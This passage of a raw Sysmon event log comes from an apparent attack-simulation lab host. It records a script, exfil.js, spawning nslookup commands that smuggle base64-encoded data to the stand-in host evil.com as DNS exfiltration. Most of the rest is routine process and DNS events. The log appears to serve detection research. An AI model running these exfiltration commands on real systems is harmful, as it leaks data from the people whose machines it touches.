14:16:36.745{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17C4-629A-0541-000000005F02}2128C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000201844Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.730{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201843Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.730{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201842Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.730{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201841Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.730{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201840Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.730{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17C4-629A-0441-000000005F02}7408C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000201839Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.730{2E1864BB-17A1-629A-783D-000000005F02}55526172C:\Windows\System32\WScript.exe{2E1864BB-17C4-629A-0441-000000005F02}7408C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000201838Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.739{2E1864BB-17C4-629A-0441-000000005F02}7408C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlelyox.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000201837Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.730{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlirxao.tmpMD5=13B747063E29DDAFB1C25744F690BAA2,SHA256=FFD02DE1BE5A2F9B37BEA75BF31D9F7DC3AB49C7A69DB9B5050D219E835321C0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000201836Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.692{2E1864BB-17C4-629A-0241-000000005F02}48327272C:\Windows\system32\conhost.exe{2E1864BB-17C4-629A-0341-000000005F02}1700C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201835Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.692{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201834Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.692{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201833Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.692{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201832Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.692{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201831Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.676{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C4-629A-0341-000000005F02}1700C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000201830Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.676{2E1864BB-17C4-629A-0141-000000005F02}73726576C:\Windows\system32\cmd.exe{2E1864BB-17C4-629A-0341-000000005F02}1700C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000201829Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.691{2E1864BB-17C4-629A-0341-000000005F02}1700C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A U2VydmljZU5hbWU6IGVuYQ== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17C4-629A-0141-000000005F02}7372C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A U2VydmljZU5hbWU6IGVuYQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlirxao.tmp 2>&1 354300x8000000000000000201828Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.899{00000000-0000-0000-0000-000000000000}2256<unknown process>-udpfalsefalse127.0.0.1-52850-false127.0.0.1-53domain 354300x8000000000000000201827Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.899{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52850- 354300x8000000000000000201826Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.899{00000000-0000-0000-0000-000000000000}2256<unknown process>-udptruefalse127.0.0.1-52850-false127.0.0.1-53domain 354300x8000000000000000201825Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.899{00000000-0000-0000-0000-000000000000}2256<unknown process>-udpfalsefalse127.0.0.1-52849-false127.0.0.1-53domain 354300x8000000000000000201824Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.899{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52849- 354300x8000000000000000201823Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.899{00000000-0000-0000-0000-000000000000}2256<unknown process>-udptruefalse127.0.0.1-52849-false127.0.0.1-53domain 354300x8000000000000000201822Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.898{00000000-0000-0000-0000-000000000000}2256<unknown process>-udpfalsefalse127.0.0.1-52848-false127.0.0.1-53domain 354300x8000000000000000201821Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.898{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52848- 354300x8000000000000000201820Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.898{00000000-0000-0000-0000-000000000000}2256<unknown process>-udptruefalse127.0.0.1-52848-false127.0.0.1-53domain 354300x8000000000000000201819Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.764{00000000-0000-0000-0000-000000000000}5960<unknown process>-udpfalsefalse127.0.0.1-52847-false127.0.0.1-53domain 354300x8000000000000000201818Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.762{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52847- 354300x8000000000000000201817Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.762{00000000-0000-0000-0000-000000000000}5960<unknown process>-udptruefalse127.0.0.1-52847-false127.0.0.1-53domain 354300x8000000000000000201816Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.760{00000000-0000-0000-0000-000000000000}5960<unknown process>-udpfalsefalse127.0.0.1-52846-false127.0.0.1-53domain 354300x8000000000000000201815Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.760{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52846- 354300x8000000000000000201814Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.760{00000000-0000-0000-0000-000000000000}5960<unknown process>-udptruefalse127.0.0.1-52846-false127.0.0.1-53domain 354300x8000000000000000201813Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.758{00000000-0000-0000-0000-000000000000}5960<unknown process>-udpfalsefalse127.0.0.1-52845-false127.0.0.1-53domain 354300x8000000000000000201812Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.758{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52845- 354300x8000000000000000201811Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.757{00000000-0000-0000-0000-000000000000}5960<unknown process>-udptruefalse127.0.0.1-52845-false127.0.0.1-53domain 354300x8000000000000000201810Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.572{00000000-0000-0000-0000-000000000000}5516<unknown process>-udpfalsefalse127.0.0.1-52844-false127.0.0.1-53domain 354300x8000000000000000201809Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.572{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52844- 354300x8000000000000000201808Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.572{00000000-0000-0000-0000-000000000000}5516<unknown process>-udptruefalse127.0.0.1-52844-false127.0.0.1-53domain 354300x8000000000000000201807Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.571{00000000-0000-0000-0000-000000000000}5516<unknown process>-udpfalsefalse127.0.0.1-52843-false127.0.0.1-53domain 354300x8000000000000000201806Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.571{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52843- 354300x8000000000000000201805Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.571{00000000-0000-0000-0000-000000000000}5516<unknown process>-udptruefalse127.0.0.1-52843-false127.0.0.1-53domain 354300x8000000000000000201804Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.571{00000000-0000-0000-0000-000000000000}5516<unknown process>-udpfalsefalse127.0.0.1-52842-false127.0.0.1-53domain 354300x8000000000000000201803Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.571{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52842- 354300x8000000000000000201802Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.571{00000000-0000-0000-0000-000000000000}5516<unknown process>-udptruefalse127.0.0.1-52842-false127.0.0.1-53domain 354300x8000000000000000201801Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.425{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52841- 354300x8000000000000000201800Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.425{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52840- 354300x8000000000000000201799Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.424{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52839- 354300x8000000000000000201798Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.315{00000000-0000-0000-0000-000000000000}2192<unknown process>-udpfalsefalse127.0.0.1-52838-false127.0.0.1-53domain 354300x8000000000000000201797Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.315{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52838- 354300x8000000000000000201796Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.315{00000000-0000-0000-0000-000000000000}2192<unknown process>-udptruefalse127.0.0.1-52838-false127.0.0.1-53domain 354300x8000000000000000201795Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.229{00000000-0000-0000-0000-000000000000}7084<unknown process>-udpfalsefalse127.0.0.1-52837-false127.0.0.1-53domain 354300x8000000000000000201794Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.229{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52837- 354300x8000000000000000201793Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.229{00000000-0000-0000-0000-000000000000}7084<unknown process>-udptruefalse127.0.0.1-52837-false127.0.0.1-53domain 354300x8000000000000000201792Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.228{00000000-0000-0000-0000-000000000000}7084<unknown process>-udpfalsefalse127.0.0.1-52836-false127.0.0.1-53domain 354300x8000000000000000201791Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.228{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52836- 354300x8000000000000000201790Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.228{00000000-0000-0000-0000-000000000000}7084<unknown process>-udptruefalse127.0.0.1-52836-false127.0.0.1-53domain 354300x8000000000000000201789Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.228{00000000-0000-0000-0000-000000000000}7084<unknown process>-udpfalsefalse127.0.0.1-52835-false127.0.0.1-53domain 354300x8000000000000000201788Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.228{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52835- 354300x8000000000000000201787Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.228{00000000-0000-0000-0000-000000000000}7084<unknown process>-udptruefalse127.0.0.1-52835-false127.0.0.1-53domain 354300x8000000000000000201786Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.145{00000000-0000-0000-0000-000000000000}1788<unknown process>-udpfalsefalse127.0.0.1-52834-false127.0.0.1-53domain 354300x8000000000000000201785Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.145{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52834- 354300x8000000000000000201784Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.145{00000000-0000-0000-0000-000000000000}1788<unknown process>-udptruefalse127.0.0.1-52834-false127.0.0.1-53domain 354300x8000000000000000201783Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.145{00000000-0000-0000-0000-000000000000}1788<unknown process>-udpfalsefalse127.0.0.1-52833-false127.0.0.1-53domain 354300x8000000000000000201782Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.145{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52833- 354300x8000000000000000201781Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.145{00000000-0000-0000-0000-000000000000}1788<unknown 